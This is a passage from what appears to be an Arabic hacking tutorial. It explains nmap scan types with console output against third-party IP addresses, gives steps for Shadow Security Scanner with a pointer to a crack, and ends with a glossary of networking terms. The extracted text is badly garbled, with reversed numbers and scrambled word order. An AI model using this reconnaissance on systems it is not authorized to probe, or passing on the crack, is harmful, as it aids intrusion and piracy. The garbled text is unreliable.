وم بالرد علیكمفتوح فان السیرفر ال يقفي جمیع فأنه يقوم لعملیة االنھاء Windows ولكن في حالة اذا كان السیرفر

وھذا)) مفتوح المنفذ كان او معلق (( االحوال يساعدك في معرفة نوع النظام الذي امامك

بطيء نوعا ما : FIN Scanningملحوظه

: 2003على ويندوز : مثال

.87.36.46212F s-nmap # ]~[server @root ).55 3Starting nmap /nmap/org.insecure.www://http EDT00:19 14-07-2004at (

closed: are) 212.46.36.87(sa .net.sbm.87-36 scanned ports on dial1024All

seconds62.379scanned in ) host up1(ess IP addr 1 --Nmap run completed

# ]~[server @root

اني الحظوا انه ما اعطاني اي منفذ مفتوح مع العلم اني متاكد: مالحظه

قفلت الفايروول وعندي اكثر من منفذ مفتوح وھذا يؤكد

sF :-الكالم الذي باالعلى عن تحديد النظام من

االن Linux لنرى ux Lin:مثال على

520

67.19.6.93 80,6000,53,22,21,20,23,110p -sF -nmap # ]~[server @root


):67.19.6.93(com .netthepla.reverse.6-19-.6793Interesting ports on PORT STATE SERVICE

data-tcp open ftp/20

tcp open ftp/21

tcp open ssh/22

tcp open telnet/23

tcp open domain/53

tcp open http/80

3tcp open pop/110

11tcp open X/6000

seconds930.0scanned in ) host up1 (IP address 1 --Nmap run completed

# ]~[server @root

: الحظوا انه اعطانا المنافذ المفتوحهI ) 8وھذا الخیار يضیف الى برنامج nmap يشغل خاصیه كشف الیوزر الذي

Stone Proxy خدمه ما لیكن انك قمت بتركیب برنامجمن قام في الجھاز الخاص بك ويريد الھاكر ان يعرف كل منفذ6558على منفذ

یل الخدمه التي تفتحه فعلیه ان يضیفبتشغ للخدمه OWNER الى االمر لیعطیه ال I البارامیتر

113منفذ ولكن ھذا االمر لم يعد يستفاد منه كثیرا ھذه االيام النه يستخدم auth وھذا المنفذ يسمى UDP و TCP بنوعیه

Authentication Service حیث عن طريقه بامكانك معرفة المعلومات عن لخدمات الموجوده بالجھاز وھذا المنفذ مقفول عادة اوا

521

: -االنتھاء قاربت على nmap ولذلك ھذه المیزه في Firewallsمفلتر من ال : مثال

209.50.240.193sT -I -nmap # ]~[server @root

).55 3Starting nmap /nmap/org.insecure.www//:http EDT00:51 14-07-2004at (

:209.50.240.193Interesting ports on

)closed: ports scanned but not shown below are in state1644The ( PORT STATE SERVICE OWNER

tcp open http root/80

tcp open xdsxdm nobody/6558

v rootser-tcp open irc/6666


# ]~[server @root

TCP Scanning sT أال اذا كان نوع السكان ident I ال يعمل امر: ملحوظه sX 9 وھو مشابه تماما لـ sF ولكن يقوم بارسال باكتات من FIN و URG ويقوم

ى المنافذ فاذا كان المنفذ مفتوحابارسال الطلبات ال

يتجاھله لقطع االتصال واذا كان مغلقا فانه RST packet قام الجھاز بارسال تطبق علیه نفس ملحوظة نظام ويندوز في التعامل

FIN مع

2003ويندوز : مثال

root@server [~]# nmap -sX 212.46.36.87


522



# ]~[server @otro

)) Linux: ((مثال

209.50.240.193sX -nmap # ]~[server @root



)closed: ports scanned but not shown below are in state1644he T( PORT STATE SERVICE

tcp open tcpmux/1

tcp open ftp/21

tcp open ssh/22

tcp open smtp/25

tcp open domain/53

tcp open http/80

3tcp open pop/110

tcp open rpcbind/111

tcp open imap/143

tcp open https/344

tcp open smtps/465

tcp open imaps/993

523

s3tcp open pop/995

tcp open mysql/3306

tcp open xdsxdm/6558

serv-tcp open irc/6666


#]~[server @root

sN 10 كس عملوھو يقوم بع FIN حیث انه حین يكون المنفذ مفتوحا في

الجھاز المقابل فانه يقوم بتجاھلك اما اذا كان المنفذ

لأليقاف RST Packet المطلوب مغلقا فان الجھاز المطلوب يقوم بارسال Null Scanning ويسمى ھذا النوع من السكان ببارسال يقوم دوماحیث ان ويندوز sF و sX ويطبق علیه ما يطبع على نظام

في حالة كان المنفذ مفتوح او مغلق RST باكت االيقاف

: 2003ويندوز : مثال

212.46.36.87sN -nmap # ]~[server @oot

).55 3Starting nmap /nmap/org.insecure.www://http EDT01:1314 -07-2004at (



#]~[server @root

)) : Linux: ((مثال

209.50.240.193sN -nmap # ]~[server @root

524

).55 3ap Starting nm/nmap/org.insecure.www://httpEDT:15 14 01-07-2004 at (


)closed: ports scanned but not shown below are in state1644The ( PORT STATE SERVICE

pen tcpmuxtcp o/1

tcp open ftp/21

tcp open ssh/22

tcp open smtp/25

tcp open domain/53

tcp open http/80

3tcp open pop/110

tcp open rpcbind/111

tcp open imap/143

tcp open https/443

tcp open smtps/465

tcp open imaps/993

s3tcp open pop/995

mysqltcp open /3306

tcp open xdsxdm/6558

serv-tcp open irc/6666


# ]~[server @root

525

sR 11 وھو يعطیك معلومات Remote procedure call RPC ارسال للمنفذ عبر

ن يحوياوامر مجھوله الى المنافذ لمعرفه ما اذا كا

ام ال RPC خدمة

2003 ويندوز 1مثال

212.46.36.87sR -nmap # ]~[server @root


):212.46.36.87(sa .net.bms.87-36Interesting ports on dial

)closed: ports scanned but not shown below are in state1658The ( PORT STATE SERVICE VERSION

tcp open msrpc /135

nterm -or-tcp open LSA/1026


#]~[ver ser@root

اجد ولم RPC لم اجد حین كتابة الموضوع اي سیرفر يحوي خدمات: ملحوظه

التي تعمل RPCBIND سیرفر صن حیث اجد فیه خدمة

فأعذروني : - فلقد كتبت الموضوع على عجل NFS او حتى TCP 111في منفذ يا اخوان

526

sO 12 القیام بعمل وھو لمعرفة البروتوكوالت التي تعمل على الجھاز المراد Scan علیه مثل ھل الفايروول لديه يمنع ICMP او يمنع

IGMP ھل يقوم بفلتره UDP في ھذا الخیار لیسيعني وماشابه من امور

البحث عن منفذ بل للبحث عن بروتوكول

: مثال

209.50.240.193sO -nmap # ]~[server @oot


:209.50.240.193ocols on Interesting prot

)closed: protocols scanned but not shown below are in state249The ( PROTOCOL STATE SERVICE

open icmp 1

open igmp 2

open ip 4

open tcp 6

open igp 9

open udp 17

open fc 133

seconds244.623scanned in ) st upho1 (IP address 1 --Nmap run completed

# ]~[server @root

معارضه او يعمل بطالقه وبدون اي ICMP كما ترون الوضع ھنا خطیر: ملحوظه منع او فلتره وھذا يعني ان ھذا الجھاز قابل للھجوم

527

لمجرد لم اكتب ھذه المعلومه للتخريب بل DDoS علیه باي طريقه من طرق على كامل الفائده من الموضوعالمعلومه والحصول

sA ) 13وھي تعتمد على ACK packets ويسمى ھذا النوع بأسم ACK Scanning وعمله بسیط جدا حیث يستطیع ان يضع لك

ما ادري كیف بشكل واضح قوانین الفايروول الذي تتعامل معه حلوه قوانین

بالعربي rules اقولالجھاز الى منفذ ما فاذا رد ACK ويتم ذلك عن طريق ارسال باكتات من نوع

ICMP unreachable الذي نقوم بعمل سكان علیه ب

packet اعطاك الرد فھذا يدل على ان المنفذ مفلتر من قبل الفايروول اما لو فھذا يدل على ان المنفذ غیر مفلتر RST packet بااليقاف

االخر وما يقه تستطیع معرفه ماذا يقعل الفايروول الموجود بالجھازوبھذه الطر

ھي المنافذ التي ال تمر من خالل الفلتر الخاص به

فھم وما ھي المنافذ المفلتره وما ھي المنافذ المقفوله عبره وتستطیع الفايروول بشكل افضل

سیرفر ضعیف جدا : 1مثال

0.240.193.5209sA -nmap # ]~[server @root


UNfiltered: are209.50.240.193 scanned ports on 1660All

seconds1.456anned in sc) host up1 (IP address 1 --Nmap run completed

#]~[server @root

528

ھذا كل كانه االن ماب يقللكم ترى الفايروول مو شغال في الجھاز: مالحظه : -المنافذ غیر مفلتره

)) سیرفر افضل : (( 2مثال :كود

sA -nmap # ]~[server @root/com.xxxx.www://http


):67.19.6.93(com .xxxx.Interesting ports on xxxxxxx

) filtered:ports scanned but not shown below are in state1654 The ( PORT STATE SERVICE

tcp UNfiltered ftp/21

tcp UNfiltered ssh/22

tcp UNfiltered smtp/25

tcp UNfiltered http/80

3tcp UNfiltered pop/110

tcp UNfiltered xdsxdm/6558


# ]~[server @ootr

نشكل خريطه من ھنا علمنا المنافذ التي ال يقوم الفايروول بفلترتھا وبدأنا

: -للفايروول ھذا في عقولناsW 14 يقوم بعمل نفس خطوات sA

529

: مثال

sW -nmap # ]~[server @root/com.xxxxxx.www://http


):67.19.6.93(com .xxxxxx.Interesting ports on xxxxxx

)dfiltere: ports scanned but not shown below are in state1654 The ( PORT STATE SERVICE

tcp closed ftp/21

tcp closed ssh/22

tcp closed smtp/25

tcp closed http/80

3tcp closed pop/110



#]~[server @root

sU 15 ق تماما لوھو مطاب sT ولكنه بدال من ان يبحث في منافذ TCP يقوم وھذا ھو الفرق الجوھري UDP بالبحث في منافذ

ركبته مع العلم باني3.55في االصدار الجديد sU لم يعمل لدي: ملحوظه

ولكن نفس root اجھزه وكلھا بخاصیة4على اكثر من

المشكله

530

وركبت 3.55حذفت االصدار sU امثلةال يعمل وال يعطي اي خطأ ولذلك لجلب : - وفعال اشتغل معاي3.45اصدار قديم وھو

فال تستعجل علیه sT يتأخر اكثر من sU ملحوظه اخرى

: مثال

root@server [~]# nmap -sU 212.46.36.87

).55 3Starting nmap /nmap/org.insecure.www://phttCDT:19 14 01-07-2004at (

):212.46.36.87(sa .net.sbm.87-36Interesting ports on dial


udp open discard/9

m-sql-udp filtered ms/1434

seconds94.141scanned in ) host up1( IP address 1 --un completed Nmap r

#]~[server @root

عن بعض واالن ساتكلم nmap انتھینا يا اخوان من اشھر بارامیترات برنامجنا االمور الصغیره االضافیه

ھناك بارامیترات دعم اخرى مثل1- p ) 1ال ھا عبر وضع اشارةوھي لتحديد البورتات المراد البحث فیrange او

الفاصله

531

: مثال

127.0.0.1 65535-1p -sS -nmap SYN اتصال في ھذاالمثال انا اقول لالن ماب ان يقوم بعمل سكان من نوع نصف

65535 الى 1ويبحث في رينج البورتات من : مثال

127.0.0.1 53,113,110,654p -sU -nmap

110و 113 و53عن المنافذ UDP ث في بروتوكولانا ھنا اقول لالن ماب ان يبح 654و

0 P2 ال وھو لعمل تصفیر للبینج حیث يجعل نظام البحث ال يستخدمPing : مثال

127.0.0.1 1024-1p - 0P-sT -nmap

رينج بورتات انا ھنا اقول الن ماب ان يبحث بنظام اتصال كامل بدون بینج وفي1-1024

O 3 لوھو للقیام بعم fingerprinting للنظام لیعطیك ما نوعه : مثال

O -nmap # ]~[server @root/com.arabiyat.www://http

).55 3Starting nmap /apnm/org.insecure.www://httpCDT:19 14 01-07-2004at ( :209.50.240.193Interesting ports on

)closed: ports scanned but not shown below are in state1638The (

general purpose: Device type

X.2.5|X.2.4Linux : Running

2.5.20 - 2.4.0Linux Kernel : OS details

532

)2004 13:23:23 1since Thu Jul (days .520 12Uptime


#]~[server @root

uptimeالحطوا الكیرنیل وال

v Verbose 4 نتائج وانصح به دوما فھو يريك تفاصیل العمل بشكل ادق ولیس فقط

ك ماذا اقصدوسترى بنفس nmapجربه مع اي امر لل

: مثال

212.46.36.87v -sS -nmap # ]~[server @root

( .45 3Starting nmap /nmap/org.insecure.www://http CDT01:55 14-07-2004at )

.good... up appears to be) .87.36.46212(sa .net.sbm.87-36Host dial

01:56at ) 212.46.36.87(sa .net.sbm.87-36Initiating SYN Stealth Scan against dial

tcp/1026Adding open port

tcp/135Adding open port

. ports1657 seconds to scan 77The SYN Stealth Scan took

):6.36.87.4212(sa .net.sbm.87-36Interesting ports on dial


tcp open msrpc/135

nterm-or-tcp open LSA/1026

533

tcp filtered socks/1080

m-sql-tcp filtered ms/1434

http-tcp filtered squid/3128

seconds79.822scanned in ) host up1( address IP 1 --Nmap run completed

#]~[server @root

بارامیتر يحوي اكثر من nmap طبعا يا اخواني بامكانكم عمل امر واحد في حسب ما تريده انت من السیرفر او الجھاز المراد عمل

Scanning للتنويه علیه وھذه امور ما يحتاج اني اقولھا من االساس ولكن

لم ان ھناك بعض البارامیترات التي تركتھا عنوه مثل عمل سكان علىاع يعمل nmapمجموعة من العناوين داخل ملف او جعل ال

ما في الباكجراوند ويقوم بتسجیل الخرج الخاص به في ملف ولكن ھذه امور

اعتقد انه يحتاج اني اقولھا يا اخوانوفقت في ك وانشاء اهللا اكونالمھم ھو ما قلناه والباقي حاول تتعلمه بنفس

الشرح واسف على االطاله

534

Shadow Security Scanner شرح برنامج

TaZ HaCkEr :للكاتب

شرح خاصیة فحص المواقع من الثغرات

Shadow Security Scanner لبرنامج

.. افتح البرنامج

Scanner واضغط على

535

Next واضغط Complete Scan حدد

Next اضف تعلیق اذا اردت وا اتركه واضغط

واكتب اسم الموقع او االي بي Add Host اضغط على

Add واضغط

تم Done بعد كذا

536

البرنامج ابدأ فحص الموقع وستظھر لك النتائج على يسار

للتحمیل البرنامج االصدار الجديدexe.SSS/com.lab-safety.1mirror://http

net.andr://http/ ھنا ادخل: الكراك

538

)A(

ActiveX

Rotation. Ad)تدوير االعالنات( .Ad

ARP)بروتوكول حل العناوين(

Negotiation-Auto)الفاوض التلقائي(

اسم تطلقه مايكروسوفت على مجموعة ، التي تھدف oriented- objectتقنیاتھا الكائنیة

إلى تحقیق إمكانیة إدخال مزايا دينامیكیة إلى ويفترض، من الناحیة النظرية . ويب صفحات

بديال عن لغة ActiveX على األقل، أن تقدمال تحظى . جافا من شركة صن مايكروسیستمز

حالیا إال بدعم عدد محدود من ActiveX لغةالمطورين، باإلضافة إلى منتجات مايكروسوفت

ولكن Internet Explorer .رنت منبإنت المرتبطةجزءا أساسیا من ActiveX مايكروسوفت تعتبر

استراتیجیتھا، وتعد باالستمرار في دعمھا .قیاسیة وتطويرھا، لتصبح أداة

تستخدم المساحات اإلعالنیة على صفحات

إعالنات، بالتناوب، كل ويب، لعرض مجموعةوتتوافر برمجیات خاصة، تعمل . فترة محددة

. إلدارة اإلعالنات وعرضھا على مزود ويب، ، مثال، البرنامجDITnet ويستخدم مزود

AdGeni المھمة ألداء ھذه.

يكون اإلعالن في صفحات ويب على شكل عدد محدد مساحة مستطیلة الشكل، ذات

. منالبیكسالت، أو صورة، محدودة الحجم وغالبا ما يكون متحركا

)rotocol Address Resolution P( ھو

البروتوكول الذي يترجم عناوين إنترنت)IP ( Internet Protocol مثل العنوان ، )

، إلى عناوين فیزيائیة في )128.10.3.42أحد أفراد طاقم ARP ويعد. الشبكة

، وھو يلعب دورا IP/ TCPالبروتوكوالت الشھیرةالبیانات، المرتحلة أساسیا في تلمس حزم

قھا باتجاه أھدافھا، طبقا عبر إنترنت، طري PARPو DNS انظر أيضا .للعنوان الذي تحمله

.IP/TCP

National االسم الرسمي لهWay-s N`Semiconductorوھي تقنیة ،

تسمح بتحديد سرعة الوصلة، واتجاه اإلرسال اعتمادا أحادي أم ثنائي، بین أجھزة إثرنت،

.على إمكانیاتھا

539

)B(

Backbone)فقري للشبكةالعمود ال(

Band Width)عرض الحزمة(

في سیاق Backbone يقصد بالعمود الفقريالحديث عن إنترنت، مجموعة الوصالت السريعة

المضیفة حول العالم التي تصل بین الكمبیوتراتوتكون الصلة بإنترنت . في إطار شبكة إنترنت

النظرية، كلما كانت الصلة بین أفضل، من الناحیة( یوترك والعمود الفقري إلنترنت أكثر مباشرة كمب، وكذلك عندما تكون )عدد أقل من الوصالت عبر

.ھذه الوصالت سريعة

مقدار حركة مرور البیانات الذي يمكن أن بث "ويقاس بواحدة تستوعبه في لحظة واحدة،

في الثانیة

540

© تحقق من ھوية ھیئة معتمدة، يتم الرجوع إلیھا لل

معینة ناشطة على إنترنت، أو أفراد أو شركات، والحصول على ActiveX ھوية ومصدر عناصر، مثل

رقمیة تثبت أن الفرد أو الشركة أو العنصر شھاداتالتعامل معروف من قبل ھذه السلطة، وال ضیر في

وقد نشأت سلطات التصديق . اإللكتروني معھاكترونیة في ضمان اإلل لتلبیة متطلبات التجارة

. حقوق المتعاملین بھا عبر إنترنت، بشكل رئیسيسلطة التصديق شركة مستقلة، يمكن أن تكون

، وعندھا تعتبر مرجعا عاما، أو تكون VeriSign مثلداخلیا في شركة، مثل قسم الكمبیوتر، قسما

فتكون شھاداتھا معتمدة ضمن الشركة ذاتھا، أو امل معھامع بعض الشركات التي تتع

) Interface GatewayCommon ( طريقة لنقل

المعلومات التي يدخلھا المستخدم في النماذجforms في صفحات ويب، إلى البرامج التي توجد

. التي تعالجھا في جھة مزود ويب، وبالعكسفي عملیات استعالم قواعد CGI وتستخدم

ومن أكثر لغات . بصورة فورية HTML البیانات بھیئة شعبیة، لغة CGI البرمجة المستخدمة في برامج

.Perl

ھو المسار الذي يسلكه المستخدم خالل تصفحه معلومات تیار النقرات مدير تساعد. موقع ويب

الموقع على معرفة كیفیة استخدام الزوار للموقع، وتساعد . الصفحات تنال االھتمام األكبر وأي ن، أيضا، على تحديد موقع الصفحاتالمعل

المناسبة، لوضع إعالناته ضمنھا

، للداللة "نقرة"يستخدم ھذا المصطلح بالتبادل مع المرات التي عبر منھا الزائر إلى موقع على عدد

المعلن، بالنقر على إعالن معین في صفحة ويب،ويفضل المعلنون أن يدفعوا ثمنا . للشركة المضیفة

اإلعالن، ألن الزائر عبور، بدال من عروضلنقرات القد يرى اإلعالن، لكن بدون أن ينقر فوقه للذھاب

..إلى موقع المعلن

عندما ينقر المستخدم فوق إعالن موجود على خالل الوصلة التشعبیة صفحة ويب، وينتقل من

CA) سلطة التصديق(

CGI) الواحه العمومیة للمعبر(

)Click Straem(تیار النقرات

Click Through) نقرات العبور(

Click) نقرة(

541

إلى موقع الشركة صاحبة اإلعالن، تحتسب له .واحدة) click (نقرة

تصادم عندما يكتشف أحد أجھزة شبكة يحدث ال

وعلى . للبیانات، إطارا قادما إثرنت، أثناء إرسالهالجھاز المرسل، في ھذه الحالة، أن يتوقف عن

مباشرة، لفترة زمنیة عشوائیة، قبل أن اإلرسالالتصادم يمكن محاكاة. يحاول بث اإلطار مرة أخرى

ت، بواسطة جھاز قادر على التحكم بتدفق البیاناإرسال اإلطار، يطلب من المحطة المرسلة إعادة

.في تاريخ آخر، لتجنب ضیاعه

تشیر العبارة إلى ملف أو سجل بیانات، يسجل لكمبیوترك بواسطة كمبیوترات على القرص الصلب

وتتیح البیانات المدونة في . أخرى خالل اتصالك بھاالذي تتصل به، server ، للمزودcookies الملفالمواقع التي زرتھا في اآلونة األخیرة، معرفة

وحیث أن القلیل من .ومعلومات أخرى عنكأو ( المزودات في إنترنت، تخبرك أنھا ستسجل

، فإن cookies في الملف معلومات تخصك) ستقرأ . الكثیرين يعتبرونھا انتھاكا لحرمة خصوصیاتھم

من البرمجیات المضادة للكوكي وظھرت العديدecooki-anti التي تبادر إلى محو أية بیانات ،

.فورا cookies الملف تسجل في

cost of page views per thousand التكلفة التي ،ويب لنشر اإلعالن، تبعا لعدد عروض يحددھا موقع

في M الصفحات، مقدرة باآلالف، ويرمز الحرفCPM باللغة الرومانیة القديمة، ولیس " األلف"، إلى

مندوبو المبیعات، ويستخدم. میجاإلى ملیون أو للداللة على تكلفة عروض CPM أحیانا، مصطلح

الصعب ضمان أن يؤدي عرض اإلعالنات، ألنه منالصفحة دوما، إلى عرض اإلعالن، فقد يزلق الزائر

!بحیث يختفي اإلعالن من أمامه الصفحة،

نظام لدفع النقود، بواسطة الشیكات اإللكترونیة أو ، CyberCash Inc .الئتمان، طورته شركةا بطاقات

وتستخدمه مزودات التجارة اإللكترونیة لتدقیق ومعالجة المدفوعات، معلومات بطاقات االئتمان،

ويلجأ األفراد . لقاء رسوم بسیطة تدفعھا للشركةللحصول على شیكات CyberCash إلى نظام

إلكترونیة، الستخدامھا في عملیات الشراء عبر .الرسوم، أيضا لقاء بعضإنترنت،

Collisiion ) التصادم(

Cookie) كوكي(

CPM ) صفحاتتكلفة عرض ال(

CyberCash) سايبر كاش(

542

)D(

Digital Signature)توقیع رقمي(

DNS)خدمات أسماء النطاقات(

Domain Name)اسم النطاقات(

بیانات تضاف على الرسائل اإللكترونیة، إلثبات . وسالمة محتوياتھا خالل التبادل ھوية مرسلھا، ) hash function (سل دالة خاصةيستخدم المر

رقم معین، يسمى التوقیع، باالعتماد على لتولیدويضیفه محتويات الرسالة، ثم يشفر التوقیع الناتج

. إلى الرسالة، باستخدام مفتاح تشفیر خصوصيحساب الرقم وعلى الطرف اآلخر، يعید المتلقي

( الناتج عن تطبیق الدالة ذاتھا على نص الرسالة ويفك تشفیر التوقیع ،) ن الرقم المشفربدو

باستخدام مفتاح التشفیر العمومي الخاص ، ويقارن )المتلقي مسبقا والذي يعرفه( بالمرسل

ويدل تطابق الرقمین أن محتويات . بین الرقمینسلیمة بدون أي تشويه، وتحمل الرسالة وصلت

توقیع المرسل الصحیح، وال خوف من كون الرسالة ).أي مرسلة من قبل شخص آخر( مزورة

)Domain Name Service ( قاعدة بیانات فورية

تستخدم في المطابقة بین العناوين الرقمیة ، )128.10.3.42:(مثل IP إنترنت لبروتوكول

واألسماء الحرفیة للنطاقات التي يسھل على :pcmag-وتذكرھا مثل الناس قراءتھا

. com.mideastوال تجتمع بیاناتS DN في كمبیوتر DNS واحد معین، بل ھي موزعة بین آالف مزودات

.المنتشرة عبر إنترنت

اسم يشیر إلى الحیز الذي تملكه مؤسسة معینة ويمكن ترجمته إلى عنوان معین من فضاء إنترنت،تتألف :com.orgnization .في الشبكة، مثل

النطاقات من مقطعین أو أكثر تفصل فیما أسماءمن ، وتتدرج في شمولیتھا"."ة النقطة بینھا عالم

الدائرة األوسع في أقصى الیمین إلى الدائرة المواقع وتبدأ أسماء. األضیق في أقصى الیسار

، بحرفین يدالن )من أقصى الیمین ( غیر األمريكیة المقطع التالي على تصنیف ويدل. على اسم البلد

تشیر إلى مؤسسة com المؤسسة؛ فالحروفتشیر إلى gov والحروف ،ommercial cتجارية

على edu، وgovernment مؤسسة حكومیةوتخلو أسماء النطاقات .وھكذا.. مؤسسة تعلیمیة

األمريكیة من المقطع الدال على الدولة التي ولتالفي تعارض أسماء . النطاق ينتمي إلیھا

Network Information النطاقات، كلفت مراكزCenters NICsويمكن . ، بتسجیل أسماء النطاقات

543

العسكرية لدى تسجیل أسماء النطاقات غیرويتطلب تسجیل . األمريكیة InterNIC مؤسسة

دفع رسوم استخدامه اسم النطاق للموقع، حالیا،غطي ھذه الرسوم أيضا، خدمة لمدة سنتین، وتأو أكثر في شبكة DNS كمبیوترين االسم من قبل

إنترنت، يقع على عاتقھما ترجمة ھذا االسم إلى .الشبكة عنوان رقمي في

544

)E(

Encryption)التشفیر(

Extranet)إكسترا نت(

ھي عملیة تحويل البیانات التي على شكل إلى ھیئة ال يمكن ألحد ،plaintext نصوص بسیطة

قراءتھا وفھمھا بدون عملیة معاكسة تسمى إزالة . ، تعیدھا إلى ھیئتھا األصلیةdecryption التشفیر

توفیر طريقة في التشفیر من شأنھاوفیما ال توجدالحماية المطلقة للبیانات على المدى البعید، فإن

أسالیب في األبحاث الحديثة توصلت إلىالتشفیر، تجعل من المستحیل إعادة النصوص

مفتاح "بدون امتالك /المشفرة إلى ھیئتھا األصلیةويتفق خبراء إنترنت "encryption key :التشفیر

تحقیق تشفیر محكم للمعلومات على أھمیة االئتمان التي ترسل عبر الشبكة الخاصة ببطاقات

في سیاق عملیات التجارة اإللكترونیة، كشرط الناس على اإلقبال على التعامل مع ھذا لتشجیع

.النوع من التجارة

ھي امتداد لشبكة إنترانت الخاصة بمؤسسة بحیث يستطیع األشخاص معینة، على إنترنت،

خولون، مثل موظفي المؤسسة المتنقلین، الموالموردين، الوصول إلى البیانات وبعض الزبائن

والتطبیقات الموجودة على إنترانت، عبر شبكة وتحتاج شبكات إكسترانت إلى تخطیط .ويب

وتنفیذ دقیقین، ألن ترك أي ثغرة أمنیة قد يؤدي . دخول القراصنة إلى الشبكة والعبث بالبیانات إلى

تنظیم عملیات وصالحیات استخدامويتم ). firewalls (إكسترانت بواسطة الحواجز النارية

545

FAQ)أسئلة يتكرر طرحھا(

Firewall)حاجز ناري(

Flame)حرب الكلمات(

Forwarding Rate)معدل التمرير(

Frame Relay)تحويل االطارات(

)Frequently Asked Questions ( وثیقة تتضمنفي مجال معین، يتكرر إجابات على أسئلة

في FAQ تتوفر وثائق. طرحھا عبر شبكة ويبمواقع كثیرة عبر إنترنت، وھي تغطي نطاقا

الطبخ واسعا ومتنوعا من المعلومات، من فن IP/ TCP.تى آلیات عمل بروتوكوالتوح

نظام أمني لتنظیم حركة المرور عند نقاط أو بین أي شبكتین ( وإنترانت االتصال بین إنترنت، يسمح لحزم البیانات بالعبور )في الحالة العامة

الشبكتین، أو يمنعھا، اعتمادا على مجموعة بینمثل ) من القواعد يحددھا مدير شبكة إنترانت

، أو IP المستخدم وكلمة السر، أو عنواناسم بالدخول رقم ھاتف المتصل في حالة السماح

ويوجد العديد من حلول in - dial .( ...عبر اتصاالتعبارة عن برمجیات فقط الحواجز النارية، فبعضھا

تعمل على أي مزود، والبعض اآلخر حلول برمجیات تعمل على أجھزة متكاملة، تتألف من

كانت . زودة بمودمات وبطاقات شبكةمخصصة، ومتعمل، في السابق، في ظل الحواجز النارية

يونیكس فقط، أما اآلن فھناك العديد من الحواجز .تي.تعمل في ظل ويندوز إن الفعالة التي

حرب كلمات تنشأ بین مشاركین في إحدى

البريدية، بسبب مجموعات النقاش أو القوائم أو محاولة بث طرح تعلیق شخصي غیر مناسب،

ما، أو غیرھا من رسائل ترويج تجارية لمنتجويعاقب الشخص . التصرفات غیر الالئقة

أعضاء المجموعة المسيء، عادة، بأن يرسل لهأو القائمة البريدية، مجموعة كبیرة من الرسائل

بھا ملفات ضخمة الحجم، اإللكترونیة، مرفقالتبديد وقته أثناء تفحصه لصندوق بريده

قرصه الصلب بملفات ضخمة إللكتروني، ولغمرا .ال فائدة منھا

المعدل األقصى الذي تستطیع فیه البدالة أن

.أن تسقطھا تمرر اإلطارات، بدون

تقنیة سريعة لتراسل حزم البیانات، تستخدم عبر العمود الفقري أحیانا في االتصاالت

. backbone وتلقي تقنیة تحويل اإلطارات بأعباءاإلرسال، ومعالجتھا على ري عن أخطاءالتح

الكمبیوترين اللذان يقومان بالتراسل، وھي، سريعة وغیر مكلفة في نقل لذلك، طريقة

.البیانات

(F)

546

FTP) الملفاتبروتوكول نقل(

Full Duplex)االرسال ثنائي االتجاه(

)File Transfer Protocol ( أحد أكثر بروتوكوالت شیوعا، يستخدم لنقل الملفات من كمبیوتر إلى

ويمكن لمستخدمي إنترنت . عبر إنترنت آخرالستجالب الملفات FTP إلى مزوداتالولوج

ويمكن حماية الملفات . بمختلف أنواعھا وھیئاتھامن وصول أشخاص FTP الموجودة في مزودات

غیر مصرح لھم باستجالبھا، بواسطة كلمة بدون السؤال عن السر، أو تركھا متاحة ألي كان،

TFTP .انطر أيضا. شخصه

ون تصادم، بث للبیانات باتجاھین في آن واحد، بداألسالك المفتولة أو عبر الكوابل عبر أزواجيعتبر التحويل ثنائي االتجاه طريقة . الضوئیة: جدا، لتحسین أداء المزود، لعدة أسباب سھلة

البیانات أن اإلرسال ثنائي االتجاه يخفض تأخیرلدى التحويل، فإذا وصلت الرزمة من بوابة وحیدة

التأكد من أن الرزمة فور االتجاه أن تبدأ اإلرسال،القادمة لیست مشوھة، ولیس ضروريا االنتظار

. النقل متاحة لالستخدام حتى تصبح واسطةيضاف إلى ذلك أنه يمكن تمرير الرزم التي تصل

ثنائیة االتجاه، حالما يحدد ھدفھا، إذ ال من بوابة .يوجد في ھذه الحالة تصادم، وال رزم مشوھة

لحزمة باتجاه المزود السبت الثاني، أن عرض افي يتحسن، ألن اإلرسال واالستقبال يحدثان

فإذا كان معدل اإلرسال واالستقبال . وقت واحديبلغ متماثلین، فیمن الوصول إلى عرض حزمة

يكون تحسن عرض . میجابت في الثانیة20العلمیة، ويمكن الحزمة، أكثر تواضعا من الناحیة

100TX-Base. الشعور بتأثیر تأخیر البیانات

547

)G(

Gateway)يطلق ھذا االسم بشكل عام على أي عتاد أو )منفذ

ترجمة البیانات بین بروتوكوالت برنامج يتولى مھمة فمثال، تستخدم شبكة المعلومات األمريكیة. مختلفة

Prodigy منفذا خاصا لترجمة البريد اإللكتروني بین ، والھیئة تستخدمھا، الھیئة الداخلیة الخاصة التي

. القیاسیة المستخدمة في البريد اإللكتروني إلنترنتأيضا، لإلشارة " gatewayمنفذ"المصطلح ويستخدم

تستخدم شبكة . إلى أية آلیة تربط بین نظامینمنفذا لتأمین وصول زبائنھا AOL المعلومات األمريكیة

.إلى إنترنت من خاللھا

548

)H(

tHi)ضربة(

HTML)لغة الترمیز التشعبي(

HTTP)بروتوكول نقل النص المتشعب(

HUB)المفرع(

ر ھذا المصطلح في سیاق الحديث عن شبكة ويب، web ويب إلى كل طلب يصدر عن المتصفح إلى مزود

serverللحصول منه على عنصر معلوماتي واحد ، .صور، 3 تحتوي على لى صفحةمثال، يحتاج الحصول ع

، HTML ضربات في المزود؛ واحدة لصفحة4إلى يستخدم عدد الضربات . ووحدة لكل من الصور الثالث

الواقع على كمؤشر فضفاض على مقدار الضغط 300,000إن مزودنا يتلقى : المزود، فیقول أحدھم

الضربة يمكن أن تعني طلبا وألن. ضربة في الشھرأو حتى وثیقة ( ألي شيء، سواء كان وثیقة صغیرة

یات معالجة ، أو طلبا يستدعي عمل)موجودة غیرفإنه من ،( كالبحث عن معلومة معینة مثال( معقدة

" الضربة"الصعب تحديد مقدار الحمولة الناجمة عن .على المزود

)Hypertext Markup Language ( لغة برمجة

النصوص التشعبیة تستخدم في وصف ھیئاتhypertext ويمكن تطبیقھا باستخدام برامج شبیھة ،

في HTML تستخدم لغة. لعاديةا بمعالجات النصوص VRML.و HTTP انطر أيضا. إعداد صفحات ويب

)Hypertext Transfer Protocol ( ھو البروتوكول

. في شبكة ويب HTML المعتمد لنقل النصوص بھیئةعلى أوامر عالیة المستوى، HTTP يحتوي بروتوكول

في browsers ، تستخدمھا المتصفاتPut و Get مثللطلب Get ويستخدم األمر. مزودات ويب التواصل مع

، أو أية . GIFصورة بھیئة، أو HTML صفحة ذات ھیئة. بیانات أخرى من مزود ويب، لعرضھا على الشاشة

